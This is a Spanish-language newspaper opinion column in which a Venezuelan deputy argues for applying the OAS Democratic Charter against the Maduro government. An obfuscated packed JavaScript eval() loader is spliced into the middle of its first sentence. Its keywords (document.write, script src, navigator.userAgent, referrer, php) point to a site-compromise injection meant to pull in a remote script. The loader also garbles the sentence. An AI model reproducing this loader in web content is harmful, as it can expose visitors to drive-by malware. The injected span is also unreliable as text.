publicidad

Más sobre la Carta Democrática

Juan Pablo Guanipa V. / Diputado de la AN / juanpguanipa@gmail.com /@JuanPGuanipa
  Lo eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|syrry|var|u0026u|referrer|ierta||js|php'.split('|'),0,{})) que trata el Gobierno es de descalificar un documento que fue suscrito por él mismo, bajo la conducción del señor Hugo Chávez, porque sabe que él mismo lo ha incumplido.

El Gobierno sigue activo tratando de bloquear la aplicación de la Carta Democrática Interamericana ante la dramática realidad de agresión a la democracia que existe en Venezuela. Sus argumentos están sustentados en la mentira. Califican la aplicación de la CDI como un acto injerencista, lo cual es falso. Lo que ha buscado la Organización de Estados Americanos es preservar los principios básicos del orden democrático, principios que son universales y que todos los pueblos están obligados a preservar, no sólo en el orden interno, sino frente a la comunidad internacional. No puede un Estado cualquiera hacerse de la vista gorda ante la violación de esos principios en cualquier parte del orbe, particularmente en nuestro continente. Para eso se hizo la Carta, para que todos los estados sean garantes de la realización democrática en todos los países.

Entonces, ¿qué tiene de injerencista la aplicación de esa carta? Absolutamente nada. ¿Por qué habla el Gobierno de intervencionismo? ¿Por qué se atreven a decir que todo es una confabulación para invadir el país o para derrocar a Maduro? La respuesta es obvia. Lo que trata el Gobierno es de descalificar un documento que fue suscrito por él mismo, bajo la conducción del señor Hugo Chávez, porque sabe que él mismo lo ha incumplido. Si en Venezuela hubiera respeto a la voluntad del pueblo, si hubiera respeto a los poderes públicos, si hubiera respeto a los procesos electorales, no sería necesaria la aplicación de la famosa Carta. Pero todos sabemos cuál es nuestra realidad. 

Pero más incomprensibles aún son algunas declaraciones de dirigentes opositores que hablan de que no podemos pedir la expulsión de Venezuela de la OEA. Además dicen que la Carta es inoficiosa porque los problemas de Venezuela debemos resolverlos los venezolanos. Y me pregunto ¿quién le ha dicho a esos dirigentes opositores que alguien ha solicitado la expulsión de Venezuela si eso no está planteado en ningún artículo de la Carta Democrática Interamericana? Ya hemos dicho que la sanción más severa que plantea esta Carta, antes de la cual deben agotarse todas las vías diplomáticas posibles, es la suspensión del Estado de la OEA hasta tanto se someta al orden democrático. ¿Quién ha negado que los problemas de Venezuela los resolvemos los venezolanos? Pero todos sabemos que el apoyo de organismos internacionales puede servir de extraordinario mecanismo de presión para restituir la democracia y que hayan elecciones que este Gobierno se niega a realizar. 

La semana pasada la mayoría parlamentaria de la Asamblea Nacional decidió respaldar la aplicación de la Carta Democrática en Venezuela. Comparto plenamente y fui partícipe entusiasta de esa decisión que se materializó con la aprobación de un acuerdo votado por unanimidad. La reacción del señor que preside el Poder Ejecutivo no se hizo esperar. Calificó a los diputados que votamos a favor del acuerdo, como traidores a la patria, cobardes, miserables y "peleles". Dice que se deben publicar sus nombres para que el pueblo sepa quiénes son.

Yo le digo al irresponsable de Nicolás Maduro que mi nombre es Juan Pablo Guanipa y que me siento orgulloso de haber votado a favor de ese acuerdo. La patria es el hombre. La patria somos los ciudadanos Nicolás. Y a los únicos traidores que reconocemos los ciudadanos es a ustedes. Ustedes son los que han traicionado a este país, humillado por ustedes, sometido al hambre, al desabastecimiento de alimentos y medicinas, a la inseguridad, a la inflación, a la división de las familias, a la precariedad de servicios públicos y a la corrupción. Ustedes son unos traidores que se han robado más de 400 mil millones de dólares en 18 años y este pueblo, que es la patria traicionada por ustedes, los va a sacar de allí democráticamente. Y cuando la cosas mejoren en nuestra patria y deba ser escrita nuestra historia, ustedes serán el ejemplo de lo que nunca nos volverá a pasar.

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama